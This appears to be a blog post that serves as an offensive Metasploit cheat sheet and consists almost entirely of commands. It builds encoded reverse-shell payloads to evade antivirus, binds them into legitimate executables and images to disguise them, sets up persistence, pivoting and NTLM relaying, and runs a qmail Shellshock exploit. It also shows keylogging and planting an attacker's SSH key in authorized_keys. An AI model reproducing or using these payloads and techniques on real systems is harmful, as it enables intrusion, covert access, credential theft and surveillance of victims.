Basic Metasploit Commands
msfvenom -a x64 -p windows/x64/meterpreter/reverse_tcp lport=8080 lhost=attacker_Ip -f exe -e x86/shikata_ga_nai -i 3 -b '\x00\xff' > /root/Desktop/encoded.exe
shellter --> shellter is a dynamic shellcode injection tool, it can be used in order to inject shellcode into
native windows applications
downlaod any program to bind our payload
download and open shellter in windows
Select "A"
select "N"
drag the program to which our payload is to be binded
select "stealth mode" y
L
1
set attacker_ip
set port 8080
--------------------------------
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
show options
set lport 8080
MAINTAINING PERSISTANT CONNECTION
#get into a meterpreter connection first
background
use exploit/windows/local/persistence
show options
set EXE_NAME service1
set DELAY 10
sessions -i /show sessions
set session 3
show advanced
set EXE::CUSTOM /root/Desktop/malw.exe
show options
run // payload successfully injected into target machine
sessions 3
meterpreter>
Process Migration
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set RHOST
set LHOST
set LPORT
run
meterpreter> ps /lists all running processes
meterpreter > migrate ANY_PID
migrate 255
Binding a Payload to a Legitimate Executablel to Meterperter
msfvenom -p windows/shell_reverse_tcp LHOST=KALI_IP LPORT=443 -f exe -e -e x86/shikata_ga_nai -i 9 -x plink.exe -o payload_plink.exe
# Meterpreter list active port forwards
portfwd list
# Forwards 3389 (RDP) to 3389 on the compromised machine running the Meterpreter shell
portfwd add –l 3389 –p 3389 –r target-host
portfwd add -l 88 -p 88 -r 127.0.0.1
portfwd add -L 0.0.0.0 -l 445 -r 192.168.57.102 -p 445
# Forwards 3389 (RDP) to 3389 on the compromised machine running the Meterpreter shell
portfwd delete –l 3389 –p 3389 –r target-host
# Meterpreter delete all port forwards
portfwd flush
or
# Use Meterpreters autoroute script to add the route for specified subnet 192.168.15.0
run autoroute -s 192.168.15.0/24
use auxiliary/server/socks4a
# Meterpreter list all active routes
run autoroute -p
route #Meterpreter view available networks the compromised host can access
# Meterpreter add route for 192.168.14.0/24 via Session number.
route add 192.168.14.0 255.255.255.0 3
# Meterpreter delete route for 192.168.14.0/24 via Session number.
route delete 192.168.14.0 255.255.255.0 3
# Meterpreter delete all routes
route flush
Normal Shel
#list the sessions
sessions -i
use post/multi/manage/shell_to_meterpreter
set sessions 1
run
or
sessions -i
#migrate from normal shell to meterpereter
sessions -u 1
#login in as meterpterter 2=the session number
sessions 2
Metasploit One Liner
msfconsole -x "use exploit/unix/smtp/qmail_bash_env_exec;set payload cmd/unix/reverse;set LPORT 8080;set RPORT 25;set RHOST 10.10.10.10;set mailto 'admin@testqmail2.test';run;"
Pivoting
msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 10.14.14.6
run
background
sessions -i
use post/multi/manage/autoroute
set SUBNET 192.168.125.0
set SESSION 1
run
use auxiliary/server/socks_proxy
set SRVPORT 1060
run
use auxiliary/server/socks5
set SRVPORT 1090
#on Attacker Machine
sudo nano /etc/proxychains.conf
socks5 127.0.0.1 1090
Pivoting - Autoroute method
meterpreter> background
# Add Route
run autoroute -s 192.168.125.0/24
#View Route
run autoroute -p
background
use /auxilary/scanner/portscan/tcp
set RHOSTS 192.168.125.88
set THREADS 5
run
use /auxiliary/server/socks4
info
jobs -l
Setting up proxy on meterpreter
use post/windows/manage/portproxy
set CONNECT_ADDRESS 10.10.10.12
set CONNECT_PORT 80
set LOCAL_ADDRESS 10.10.10.11
set LOCAL_PORT 80
set session 1
run
Setting up Relay Server
use auxiliary/server/http_ntlmrelay
set RHOST 10.10.10.11
set RURIPATH /admin/admin.php
set URIPATH /
set SRVHOST 10.10.10.12
set SRVPORT 80
run
Passing session to Metasploit
msf5 exploit(multi/handler) > use exploit/multi/handler
msf5 exploit(multi/handler) > setg payload windows/x64/meterpreter/reverse_https
msf5 exploit(multi/handler) > setg lhost 10.10.10.12
msf5 exploit(multi/handler) > setg lport 8001
msf5 exploit(multi/handler) > setg exitfunc thread
msf5 exploit(multi/handler) > setg exitonsession false
msf5 exploit(multi/handler) > run -j
#generating a Stager
use payload/windows/x64/meterpreter/reverse_http
generate -f raw -u /tmp/shellcode.bin
xxd -ps /tmp/shellcode.bin | tr -d "\n"
#copy the shellcode and it can be run on the target machine, which returns a reverse shell to metasploit. this can be easily done via Covenant
#Go to your Grunt --> Task --> ShellCode --> paste the Hex data and execut the task. you should see a reverses shell on metasploit
BINDING A PAYLOAD TO A IMAGE
#downlaod and open autoit
#open the script that you have, replace the url with the acutal image url
#browser the script into the autoit
#set it to exe
tick --> x64
select a icon, download it and browse it -->
use this to convert a image to icon --> https://image.online-convert.com/convert-to-ico
now bind it with a payload using shellter
create a payload
msfconsole
use exploit/multi/handler
set PAYLOAD windows/shell/reverse_tcp
--> run the exploit on the target machine ..
=======================================
Meterpreter Commands======================================
#list the process
Meterpreter> ps
#Migrate the process to explorer for better connection
migrate PID
#start capturing keystrokes
keyscan_start
#dump keystrokes
keyscan_dump
#Send a keystroke
meterpreter > keyboard_send "cd /root/.ssh"
#Send "Enter" key
meterpreter > keyevent 13 press
#Send a keystroke
meterpreter > keyboard_send "echo ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDde44691/2bS5G+W9uUQ9tgJw0BJHkwUxLr5woKeh5JbYBOcrygf1rZbFBxsRcEExK0x2kSOU4DRmpcctQ+qq5ZqeYXboAGLrZBQl9hmnovbbC/5grj+Vj+OnMHaREpBTL7VXODN80KQ1/eKvqPpzx7dQt38xXKg9T8E4+X3BYEf6samL/R97do//yLAXwoDz8jRzeip23qUJrS1eBH7Bb/l+qsLBtnCv09eUDGB7JTm+m5DlnCrZRfzXmAUimH2TFgTARHOJxlrD97+uywfax6LTjCMT7p5PI7sX6F9r4gzFBHzojmuJmUXe22LcVkZvUKMdhDSYssh7XRfLrESXWsSGbgwXql+jgOcxbpc8qwakLY8x1ZkyswJOn4hFyYGojNR0fA/gY6093IDUJ3xwBQCn3Eb3jEosR54YRMeq8IJzAChy28RyV7GiqceK408Qihk3/ECHrmWI8mZ1BxJJuaq6xfP9diiARjplX6bYMZN7C2zGRAHWe7NvgONve+Ts= Bhanu@HackingDream > authorized_keys"
[*] Done
#Send "Enter" key
meterpreter > keyevent 13 press
#Take Screenshot
meterpreter > screenshot
Screenshot saved to: /home/Bhanu//FabUVLRz.jpeg
Comments
Post a Comment